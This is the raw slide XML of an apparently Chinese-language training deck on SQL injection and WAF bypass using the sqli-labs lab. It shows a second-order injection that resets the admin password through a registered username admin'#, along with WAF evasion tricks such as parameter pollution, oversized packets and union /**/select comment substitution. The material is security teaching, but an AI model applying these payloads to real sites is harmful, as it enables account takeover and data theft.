      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B2607FE-F1A6-4809-8FC6-E92A37A42C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401783" y="1011382"/>
            <a:ext cx="11402290" cy="5429927"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>本关中由于对数据库长度做了限制，所以本次只演示替换密码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>首先我们查询目前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表信息，找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>admin’# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注册一个账号，再登录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>UPDATE users SET PASSWORD='$pass' where username='$username' and password='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>curr_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>UPDATE users SET PASSWORD='123456' where username='admin'#' and password='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>curr_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>UPDATE users SET PASSWORD='123456' where username='admin’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145115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45461" y="291999"/>
            <a:ext cx="10131425" cy="35916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err="1"/>
              <a:t>Waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>绕过可大致分为三类：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>白盒绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>                                                    2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>黑盒绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>                                                    3. fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3013567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87024" y="216324"/>
            <a:ext cx="10131425" cy="4007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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>白盒绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过源代码分析，来进行绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less-25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3891593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14734" y="264815"/>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黑盒绕过</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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）规则层面的绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>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0380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56297" y="416689"/>
            <a:ext cx="10131425" cy="2483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en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>寻找源网站绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>检测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>主要针对的是云</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，找到源网站的真实地址，进行绕过，有点像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过同网段绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>防护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在一个网段中，可能经过的数据不会经过云</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，从而实现绕过。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"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1870122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20233"/>
            <a:ext cx="10131425" cy="1929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一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的执行需要优先考虑业务优先的原则，所以对于构造较大、超大数据包可能不会进行检测，从而实现绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9465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_02</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err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可参考链接： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/blogs-1024/p/11128999.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>建立镜像：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker pull </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>acgpiano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看存在的镜像：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>运行存在的镜像：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker run -dt --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>crow_sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs –p 666:80 --rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>acgpiano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参数解释：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-dt  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>后台运行； </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--name  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>命名；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-p 80:80  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>将后面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>容器端口映射到前面的主机端口，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>选项，这样在容器退出时就能够自动清理容器内部的文件系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进入运行中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>容器：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker exec -it ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>号 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3324735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_06</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en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>协议未覆盖绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>     比如由于业务需要，只对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>型进行检测，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据选择忽略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>     2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参数污染</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>index?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=1&amp;id=2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可能只对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>                                   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2421012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_07</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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）规则层面的绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注释符绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>空白符绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数分割符号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>浮点数词法解释</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>特殊语法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838665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94320"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_08</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166254" y="1316183"/>
            <a:ext cx="11859491" cy="5125128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参考链接：太多太多，总之感谢各位大佬的文章</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注释符绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>） </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>union /**/select  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>之间的空格使用注释符进行替换（适用于对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
